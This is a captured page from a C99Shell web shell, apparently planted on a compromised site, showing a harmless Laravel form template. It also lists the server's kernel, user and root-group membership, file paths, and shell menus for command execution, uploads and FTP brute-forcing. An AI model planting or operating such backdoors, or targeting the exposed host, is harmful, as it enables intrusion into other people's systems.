!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gateway.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 28.33 GB of 117.98 GB (24.01%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     0ea9108d22fccd1655a40c793f8bdf352fdcf457.php (2.11 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="row">
    <div class="from-group col-lg-6 col-xl-6 col-md-6 col-sm-12">
        <label for=""><?php echo e(trans('customer.device_name')); ?></label>
        <input type="text" class="form-control" name="name" value="<?php echo e(isset($device)?$device->name:(old('name')?old('name'):'')); ?>">
    </div>

    <div class="from-group col-lg-6 col-xl-6 col-md-6 col-sm-12">
        <label for=""><?php echo e(trans('customer.device_model')); ?></label>
        <input type="text" <?php echo e(isset($device)?'readonly':''); ?> class="form-control" name="model" value="<?php echo e(isset($device)?$device->model:(old('model')?old('model'):'')); ?>">
    </div>

    <div class="from-group mt-3 col-lg-4 col-xl-4 col-md-4 col-sm-12">
        <label for=""><?php echo e(trans('customer.android_v')); ?></label>
        <input type="text" class="form-control" <?php echo e(isset($device)?'readonly':''); ?> name="android_version" value="<?php echo e(isset($device)?$device->android_version:(old('android_version')?old('android_version'):'')); ?>">
    </div>

    <div class="from-group mt-3 col-lg-4 col-xl-4 col-md-4 col-sm-12">
        <label for=""><?php echo e(trans('customer.app_v')); ?></label>
        <input type="text" class="form-control" <?php echo e(isset($device)?'readonly':''); ?> name="app_version" value="<?php echo e(isset($device)?$device->app_version:(old('app_version')?old('app_version'):'')); ?>">
    </div>

    <div class="from-group mt-3 col-lg-4 col-xl-4 col-md-4 col-sm-12">
        <label for=""><?php echo e(trans('customer.status')); ?></label>
        <select name="status" class="form-control" id="status">
            <option <?php echo e(isset($device) && $device->status=='active'?'selected':''); ?> value="active"><?php echo e(trans('Active')); ?></option>
            <option <?php echo e(isset($device) && $device->status=='inactive'?'selected':''); ?> value="inactive"><?php echo e(trans('Inactive')); ?></option>
        </select>
    </div>
</div>
<?php /**PATH /home/picotech/domains/gateway.picotech.app/public_html/resources/views/customer/device/form.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--